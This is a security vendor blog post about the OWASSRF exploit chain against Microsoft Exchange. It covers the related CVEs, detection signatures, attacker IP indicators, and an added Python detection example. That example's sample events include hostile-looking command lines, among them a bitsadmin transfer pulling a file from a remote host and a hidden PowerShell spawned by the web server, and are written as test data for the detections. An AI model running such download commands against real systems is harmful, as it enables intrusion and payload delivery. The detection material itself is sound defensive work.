New Exchange Exploits Exploited in the Wild

December 22, 2022 by Bryson Medlock

Microsoft Exchange has received a lot of attention over the past couple of years due to a number of remote code execution (RCE) vulnerabilities specifically targeting the way Microsoft’s Internet Information Services (IIS) proxies traffic to the Microsoft Exchange back end (covered in our earlier posts). News came out this week regarding a new method of exploiting Exchange that bypasses Microsoft’s recommended mitigations for ProxyNotShell (CVE-2022-41040 and CVE-2022-41082). Specifically, this new exploit bypasses the URL rewrite mitigation guidance from Microsoft that we shared back in September; however, the bypass only defeats that mitigation and will not work if your systems are patched with the November 8, 2022 update, KB5019758.

This latest exploit, dubbed OWASSRF, was disclosed earlier this week by CrowdStrike. The original ProxyNotShell chain starts with CVE-2022-41040, a server-side request forgery (SSRF) vulnerability targeting Exchange’s Autodiscover endpoint, which allows an attacker to reach arbitrary URLs on the back end. CVE-2022-41082, an authenticated RCE vulnerability in Exchange, can then be used to execute arbitrary PowerShell commands. The new method instead targets a previously undisclosed vulnerability in the Outlook Web Access (OWA) front-end endpoint rather than the Autodiscover endpoint. Microsoft’s earlier URL rewrite mitigation guidance applied only to the Autodiscover endpoint.

Security researcher Dray Agha discovered an attacker’s open repository earlier this month, downloaded their tools, and made them available for download via Twitter. Among the leaked tools was a Python script, “poc.py”, which gives us insight into the vulnerability involved. Based on that script, the latest exploit observed in the wild appears to be related to CVE-2022-41080, which was patched in November.

[Figure: screenshot of the leaked poc.py script]

Detection

The CRU has been actively hunting based on the information available and will continue to do so. Many of the TTPs observed in this attack are not new, and existing CRU detection signatures will already detect related post-compromise activity for our partners. Partners using the CW SIEM who send us logs from their Exchange servers will find the following detection signatures in the CRU Collection:

            [CRU][Windows] Bitsadmin transfer from remote server

            [CRU][Windows] Suspicious w3wp.exe running as parent to powershell or cmd that is running child command processes

We’ve also added the following new signature specifically for CVE-2022-41080:

            [CRU][Filebeat] Potential CVE-2022-41080 Exchange Privilege Escalation Exploit
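As an added example (not the CRU's signature logic or code from this post), the two process-based detections above expressed as checks over constructed Windows process-creation records; the event fields, sample pids and the 198.51.100.7 address are all assumed for illustration:

```python
import re
from collections import defaultdict

# Constructed sample events (not from the post). Fields mimic a Sysmon/Windows
# process-creation record: pid, parent pid, image name, command line.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "w3wp.exe",       "cmdline": "w3wp.exe -ap MSExchangeOWAAppPool"},
    {"pid": 200, "ppid": 100, "image": "powershell.exe", "cmdline": "powershell.exe -nop -w hidden"},
    {"pid": 300, "ppid": 200, "image": "cmd.exe",        "cmdline": "cmd.exe /c whoami"},
    {"pid": 400, "ppid": 200, "image": "bitsadmin.exe",
     "cmdline": "bitsadmin.exe /transfer job http://198.51.100.7/a.txt C:\\Windows\\Temp\\a.txt"},
    # Benign admin activity: a scheduled script and a UNC (not HTTP) BITS transfer.
    {"pid": 500, "ppid": 1,   "image": "powershell.exe", "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"pid": 600, "ppid": 500, "image": "bitsadmin.exe",
     "cmdline": "bitsadmin.exe /transfer job \\\\fileserver\\share\\x.msi C:\\Temp\\x.msi"},
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)


def find_w3wp_shell_chains(events):
    """Return pids of powershell/cmd processes whose parent is w3wp.exe and
    which themselves spawned at least one child command process."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)
    hits = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if (e["image"].lower() in SHELLS
                and parent is not None
                and parent["image"].lower() == "w3wp.exe"
                and children[e["pid"]]):
            hits.append(e["pid"])
    return hits


def find_remote_bitsadmin(events):
    """Return pids of bitsadmin.exe /transfer jobs that pull from an http(s) URL,
    i.e. a transfer from a remote server rather than a local or UNC path."""
    hits = []
    for e in events:
        cmd = e["cmdline"]
        if e["image"].lower() == "bitsadmin.exe" and "/transfer" in cmd.lower() and REMOTE_URL.search(cmd):
            hits.append(e["pid"])
    return hits


if __name__ == "__main__":
    print("w3wp -> shell -> child:", find_w3wp_shell_chains(SAMPLE_EVENTS))
    print("remote bitsadmin transfer:", find_remote_bitsadmin(SAMPLE_EVENTS))
```

The process-tree check deliberately requires a grandchild under w3wp.exe, so a lone shell spawned by IIS with no follow-on commands is not flagged.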
IOCs

45.76.141[.]84

45.76.143[.]143

179.60.149[.]28